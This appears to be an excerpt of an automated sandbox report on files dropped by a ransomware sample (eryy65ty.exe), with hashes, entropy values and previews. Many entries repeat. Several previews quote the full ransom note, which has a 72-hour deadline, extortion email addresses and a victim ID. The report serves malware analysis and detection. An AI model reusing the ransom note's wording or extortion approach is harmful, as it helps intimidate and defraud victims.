                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):436
                                                                                                                                              Entropy (8bit):7.475609361936238
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:Y+8IvjWLfZ2M05JjOelFSC/FBQLcE1Qfbkn3/L5kkaF6Sn:Y+8IvS9NejDj9yLaAn3/L5kkaYS
                                                                                                                                              MD5:58CDE3B52BB6F27052C3F675438B9403
                                                                                                                                              SHA1:9A8E39C320BEADE41E0BBABC1B44DE4D6011055D
                                                                                                                                              SHA-256:F27BC90C0DAD687BFCB98591768DBD3BDEE2D820E18B9E7F5295444BEC6FE7E8
                                                                                                                                              SHA-512:4BF548DC8F8A6A9C13BB672F50C4A3054EE41619E233BB25850A29DCC54FBC1B9DD69088B791136EC0890F6429053EC6556ECDE6BCAE5912D915491F5DE2B835
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:\..3.>.p.j.2.H.C.:r....vD`.R&...#....=f$7..ov>.o..Q&..*..+9..V..=...VTgr..41,.)S,.>.[2....y?...IiKs...J...pH.....a.1....a.%..@/O......m..T.....p*`lm(.....x.8.1.1.....<....NP.]Y.p:..Z...Y.$...@.....N2.C..y..G.. $.m.^.....p:..z...Ee.c9F....&..uj.@}Y....n......e.x6[iBN,....\.L.84...N......U....N.S.p.3\....a...-..p.bW..Y....z.PQ.us...).cc.Ds*I.9ke.Y.....z........O..6..1..x......v.e..n...).fs%...V...$nh.nd...0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):436
                                                                                                                                              Entropy (8bit):7.475609361936238
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:Y+8IvjWLfZ2M05JjOelFSC/FBQLcE1Qfbkn3/L5kkaF6Sn:Y+8IvS9NejDj9yLaAn3/L5kkaYS
                                                                                                                                              MD5:58CDE3B52BB6F27052C3F675438B9403
                                                                                                                                              SHA1:9A8E39C320BEADE41E0BBABC1B44DE4D6011055D
                                                                                                                                              SHA-256:F27BC90C0DAD687BFCB98591768DBD3BDEE2D820E18B9E7F5295444BEC6FE7E8
                                                                                                                                              SHA-512:4BF548DC8F8A6A9C13BB672F50C4A3054EE41619E233BB25850A29DCC54FBC1B9DD69088B791136EC0890F6429053EC6556ECDE6BCAE5912D915491F5DE2B835
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:\..3.>.p.j.2.H.C.:r....vD`.R&...#....=f$7..ov>.o..Q&..*..+9..V..=...VTgr..41,.)S,.>.[2....y?...IiKs...J...pH.....a.1....a.%..@/O......m..T.....p*`lm(.....x.8.1.1.....<....NP.]Y.p:..Z...Y.$...@.....N2.C..y..G.. $.m.^.....p:..z...Ee.c9F....&..uj.@}Y....n......e.x6[iBN,....\.L.84...N......U....N.S.p.3\....a...-..p.bW..Y....z.PQ.us...).cc.Ds*I.9ke.Y.....z........O..6..1..x......v.e..n...).fs%...V...$nh.nd...0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1200
                                                                                                                                              Entropy (8bit):7.845853713868401
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:QZ7MhKeZzucUkmi2ak/KriCYPPLs17PghZk9XyR6x1ZhpZ7wCa8OY/d:VhKeZzucUk0ak/iiCvW2hCC1ZrZXt7d
                                                                                                                                              MD5:67E77F1488F613D26B6D5C3ABC0078E5
                                                                                                                                              SHA1:4BA3EB96A84F67D8925D3B633DEC191CCCA7B88A
                                                                                                                                              SHA-256:DE8CB271D8BA50C1051A666F3FA8D788D5F030E7B81431C8665B7C860680B13C
                                                                                                                                              SHA-512:2D1ED7841318855FCC5F202B005B0D35CEE720648BFFF9C58F33055AB7CEC3D3D3BF7549959AF486FEA10FA54E2C6951F6D0A32DBB329592BEBFDCCF39889894
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:4.9.....Q.6z....7...........BY......6._:..T....*-.!9cg..n..*;3....9..c...5.1>|.~vV..).G.Xx.N^.2U^X...V.&....s.u...tn.%....G.....Z..;hD.a...L.L..OI6.......&..C.v,..]$A.pP..g.=R5...a..D.Y....o.P.......=..2....6.1..0...-.i.T..C. ..Z^RBsy..+..h.Hr.....$..K...Ha... ..}.Y..O.....4;.t3...W..Mo.g?..X...YH!....$.._.x>..$."...s|-..:......_.......7t.`Fi.;.'"..........V...q,.6v..A.h.7..2.....^...p6..6...........)8.._....5.T<.y?.....+..~... ;.j.13....pOH>V..r.p.-..t......JD..p{.E...-..B..|b.@...N.\.L.2.4....r5..,.]..A.....(W..08.+.......e.f.l.....Z16........0...NXT..hC.Vgx.....8..-.m#..u3...RHN..%4r........=.....H9..i.B.`..q..o[...RS..J}4......2.!.>_c..;yu..`.EP.z ."..-.)?J.A.3...*jz.5.4.[..._......$.`...j.....i..8....E........\TO......i.-...n....9..3.4..y..9.O...(...)G.g`...SM...GG.b.g..}9.X.B.....wJ....@k..k!.W...Y....w..7........Y?....'..UW....ka...V@..e._.dW.....7Ls..%`^..G.tN.....2.......TCU..........5(vV....:t7)&.$i-t..)....;...he.g...F 9.k.....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1200
                                                                                                                                              Entropy (8bit):7.845853713868401
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:QZ7MhKeZzucUkmi2ak/KriCYPPLs17PghZk9XyR6x1ZhpZ7wCa8OY/d:VhKeZzucUk0ak/iiCvW2hCC1ZrZXt7d
                                                                                                                                              MD5:67E77F1488F613D26B6D5C3ABC0078E5
                                                                                                                                              SHA1:4BA3EB96A84F67D8925D3B633DEC191CCCA7B88A
                                                                                                                                              SHA-256:DE8CB271D8BA50C1051A666F3FA8D788D5F030E7B81431C8665B7C860680B13C
                                                                                                                                              SHA-512:2D1ED7841318855FCC5F202B005B0D35CEE720648BFFF9C58F33055AB7CEC3D3D3BF7549959AF486FEA10FA54E2C6951F6D0A32DBB329592BEBFDCCF39889894
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:4.9.....Q.6z....7...........BY......6._:..T....*-.!9cg..n..*;3....9..c...5.1>|.~vV..).G.Xx.N^.2U^X...V.&....s.u...tn.%....G.....Z..;hD.a...L.L..OI6.......&..C.v,..]$A.pP..g.=R5...a..D.Y....o.P.......=..2....6.1..0...-.i.T..C. ..Z^RBsy..+..h.Hr.....$..K...Ha... ..}.Y..O.....4;.t3...W..Mo.g?..X...YH!....$.._.x>..$."...s|-..:......_.......7t.`Fi.;.'"..........V...q,.6v..A.h.7..2.....^...p6..6...........)8.._....5.T<.y?.....+..~... ;.j.13....pOH>V..r.p.-..t......JD..p{.E...-..B..|b.@...N.\.L.2.4....r5..,.]..A.....(W..08.+.......e.f.l.....Z16........0...NXT..hC.Vgx.....8..-.m#..u3...RHN..%4r........=.....H9..i.B.`..q..o[...RS..J}4......2.!.>_c..;yu..`.EP.z ."..-.)?J.A.3...*jz.5.4.[..._......$.`...j.....i..8....E........\TO......i.-...n....9..3.4..y..9.O...(...)G.g`...SM...GG.b.g..}9.X.B.....wJ....@k..k!.W...Y....w..7........Y?....'..UW....ka...V@..e._.dW.....7Ls..%`^..G.tN.....2.......TCU..........5(vV....:t7)&.$i-t..)....;...he.g...F 9.k.....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):67975
                                                                                                                                              Entropy (8bit):7.853013003602395
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:zm3ij+AmtfZjBTCpAh5uNt5ySxSVila/VSKUyC:zm6+AKjhCpA760kla9SKUyC
                                                                                                                                              MD5:A187015E9F6C2605AE9371CCC83DAA54
                                                                                                                                              SHA1:FCC48A5C5E8D7EA9FDE5F7391BAE6A8F273AFB21
                                                                                                                                              SHA-256:DF895ABE7DAB600541711D874FCD8811D812138C9A2B6D300DBDBC20F8D48457
                                                                                                                                              SHA-512:54851EF578AB8C91396B3B960BFD886A97D8D140D026AD774F158AD69FD3C942E381B3BF8CD7250D0C53434FE459D8299DB699C70D91069C6D9FFB50CD532936
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:o.Tn.5O...).eFWg."..-...C.Atz..O.te...d.....R......;#~...E$....MJ..'C..q..._.i.H%E...+R.<........r...$.._....].s.mN.]Nr...3..D.D.R.x\p.XW^bh]..6r.2.&...yX...z..K....z....f3.s..oH1.6.....A.{...]...H[...q-..mRY..E].H.9Z.w.9..=..mP#g]E...)"....T..........^.C...ft.....3.&..}.f.i.C{.J:R.}...{>.....}......}.T..<H@.\....4Nu..=t..}...PKa......2..|i..W....}.m.=Z.....n.c.qw.k.*.iSz4F.b;.....g......@MU..%.......Kb....$B]...40.%j.......[..v...a(.].P.O....Pt.....F_..`....?...jt.K...U...7.....s.F.e..p..T..............u..%..)..j..1..0...^y<bj....\.B....0.Q&i{.0u..oc.....Y..Q.e......8.M/.....i7..S;...Z.%+^..|..V.;..H.|...'//W..G.p......[.;I4....\..{..2...`qn><..p....Y+.Y..............:..a...SP..hb.F7LA..+$}h.0..:..t. .....Q....Z.8.c......w.*xR..r:..co..2...:..V.a.D...<..H....o...P...m.7............\..&H...n..|lf..j.Ns..`Mc..9..'Q...R6.1.*...2N..-~I.p+..kH..l)z^.=J8.P.f.r.a4.K|..0............ .d...pf..BbL.......4.....1...S.a.P...M..$.Uf9..6i..~,.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):67975
                                                                                                                                              Entropy (8bit):7.853013003602395
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:zm3ij+AmtfZjBTCpAh5uNt5ySxSVila/VSKUyC:zm6+AKjhCpA760kla9SKUyC
                                                                                                                                              MD5:A187015E9F6C2605AE9371CCC83DAA54
                                                                                                                                              SHA1:FCC48A5C5E8D7EA9FDE5F7391BAE6A8F273AFB21
                                                                                                                                              SHA-256:DF895ABE7DAB600541711D874FCD8811D812138C9A2B6D300DBDBC20F8D48457
                                                                                                                                              SHA-512:54851EF578AB8C91396B3B960BFD886A97D8D140D026AD774F158AD69FD3C942E381B3BF8CD7250D0C53434FE459D8299DB699C70D91069C6D9FFB50CD532936
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:o.Tn.5O...).eFWg."..-...C.Atz..O.te...d.....R......;#~...E$....MJ..'C..q..._.i.H%E...+R.<........r...$.._....].s.mN.]Nr...3..D.D.R.x\p.XW^bh]..6r.2.&...yX...z..K....z....f3.s..oH1.6.....A.{...]...H[...q-..mRY..E].H.9Z.w.9..=..mP#g]E...)"....T..........^.C...ft.....3.&..}.f.i.C{.J:R.}...{>.....}......}.T..<H@.\....4Nu..=t..}...PKa......2..|i..W....}.m.=Z.....n.c.qw.k.*.iSz4F.b;.....g......@MU..%.......Kb....$B]...40.%j.......[..v...a(.].P.O....Pt.....F_..`....?...jt.K...U...7.....s.F.e..p..T..............u..%..)..j..1..0...^y<bj....\.B....0.Q&i{.0u..oc.....Y..Q.e......8.M/.....i7..S;...Z.%+^..|..V.;..H.|...'//W..G.p......[.;I4....\..{..2...`qn><..p....Y+.Y..............:..a...SP..hb.F7LA..+$}h.0..:..t. .....Q....Z.8.c......w.*xR..r:..co..2...:..V.a.D...<..H....o...P...m.7............\..&H...n..|lf..j.Ns..`Mc..9..'Q...R6.1.*...2N..-~I.p+..kH..l)z^.=J8.P.f.r.a4.K|..0............ .d...pf..BbL.......4.....1...S.a.P...M..$.Uf9..6i..~,.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):67975
                                                                                                                                              Entropy (8bit):7.853013003602395
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:zm3ij+AmtfZjBTCpAh5uNt5ySxSVila/VSKUyC:zm6+AKjhCpA760kla9SKUyC
                                                                                                                                              MD5:A187015E9F6C2605AE9371CCC83DAA54
                                                                                                                                              SHA1:FCC48A5C5E8D7EA9FDE5F7391BAE6A8F273AFB21
                                                                                                                                              SHA-256:DF895ABE7DAB600541711D874FCD8811D812138C9A2B6D300DBDBC20F8D48457
                                                                                                                                              SHA-512:54851EF578AB8C91396B3B960BFD886A97D8D140D026AD774F158AD69FD3C942E381B3BF8CD7250D0C53434FE459D8299DB699C70D91069C6D9FFB50CD532936
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:o.Tn.5O...).eFWg."..-...C.Atz..O.te...d.....R......;#~...E$....MJ..'C..q..._.i.H%E...+R.<........r...$.._....].s.mN.]Nr...3..D.D.R.x\p.XW^bh]..6r.2.&...yX...z..K....z....f3.s..oH1.6.....A.{...]...H[...q-..mRY..E].H.9Z.w.9..=..mP#g]E...)"....T..........^.C...ft.....3.&..}.f.i.C{.J:R.}...{>.....}......}.T..<H@.\....4Nu..=t..}...PKa......2..|i..W....}.m.=Z.....n.c.qw.k.*.iSz4F.b;.....g......@MU..%.......Kb....$B]...40.%j.......[..v...a(.].P.O....Pt.....F_..`....?...jt.K...U...7.....s.F.e..p..T..............u..%..)..j..1..0...^y<bj....\.B....0.Q&i{.0u..oc.....Y..Q.e......8.M/.....i7..S;...Z.%+^..|..V.;..H.|...'//W..G.p......[.;I4....\..{..2...`qn><..p....Y+.Y..............:..a...SP..hb.F7LA..+$}h.0..:..t. .....Q....Z.8.c......w.*xR..r:..co..2...:..V.a.D...<..H....o...P...m.7............\..&H...n..|lf..j.Ns..`Mc..9..'Q...R6.1.*...2N..-~I.p+..kH..l)z^.=J8.P.f.r.a4.K|..0............ .d...pf..BbL.......4.....1...S.a.P...M..$.Uf9..6i..~,.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):112129
                                                                                                                                              Entropy (8bit):7.709525837781355
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:5IUDIVYNhZBIDt9KFHgoYF0gOY0yLEJdUjMcps:SfAZsVFF0gOjymdYI
                                                                                                                                              MD5:458EF24DBD764206C5E1220B476CE15F
                                                                                                                                              SHA1:EDBB6C69E8A396E8C8568E21927036F4E0D8A900
                                                                                                                                              SHA-256:3CE128412A568A1EDF70EAAE35EF432CC5816A8817D24CD59C4AE5F6821852C1
                                                                                                                                              SHA-512:1D86E7BE01BA85B30B92790D360631D3EE5664B01B144E19C269FDBB4C75BA6C1A4654557B5CAA3DA16A0BC94FE798417A5EEBE41631BAD52FCDF7ACCDACD9CA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.]....cT...#W]"....u_!;....:dE.)......$I;.8.j....P...0....[...o....#M.B)...++@;@.?.>d..#a.,C.9....y..Qe....A......R....~.........4.%.`&.n....P..Z./.W..J@YO.\Z.Gqs..D..S.....&d.{.t. ...L..._..`.f...~.........`.R+}.4K..fK2.d.4....6.......@..1?|_A..N#...<..zQI....._..dq...._wW..O....5.m.W/D.`..2.._.W...C..A..DR....y...@4..d...a..u...*U.......@......w...?'...Mi.`....Td..0;..g_.yb..V.7xI....N...G.."...u..(.r.,.....F......O..p....%y.2.v.9...II.....A.M...vV]1..M.....L...m.l.cV....vU[.......L.....b;}........<._.."*K...:....-T8..V.U..0.Gn..C..E.F.............4.P..k_..0~...'...._.A.eU{..nyZZs...'...../..}..0..*...b.a....mDW.A.M...<A.../9=.....,.. i#1U.p.n>.FT...Y...z.....+..`........!9.>$H..D.....y......2J.~zo...J...b..6..w.-.{D..!..........._]..A..1I%(Q&Q.E.Y..sJ.Oy........b<..........h..auhYR.&..o4lS..*..Z..*n......W.8..9.n..8.....OA....-.......K.>p.&\z....$..^.n+......bp...0..*.o9.G.I....L}NH..*.0&.....J...6.h...[....C........w..Ge....T.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):112129
                                                                                                                                              Entropy (8bit):7.709525837781355
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:5IUDIVYNhZBIDt9KFHgoYF0gOY0yLEJdUjMcps:SfAZsVFF0gOjymdYI
                                                                                                                                              MD5:458EF24DBD764206C5E1220B476CE15F
                                                                                                                                              SHA1:EDBB6C69E8A396E8C8568E21927036F4E0D8A900
                                                                                                                                              SHA-256:3CE128412A568A1EDF70EAAE35EF432CC5816A8817D24CD59C4AE5F6821852C1
                                                                                                                                              SHA-512:1D86E7BE01BA85B30B92790D360631D3EE5664B01B144E19C269FDBB4C75BA6C1A4654557B5CAA3DA16A0BC94FE798417A5EEBE41631BAD52FCDF7ACCDACD9CA
                                                                                                                                              Malicious:false
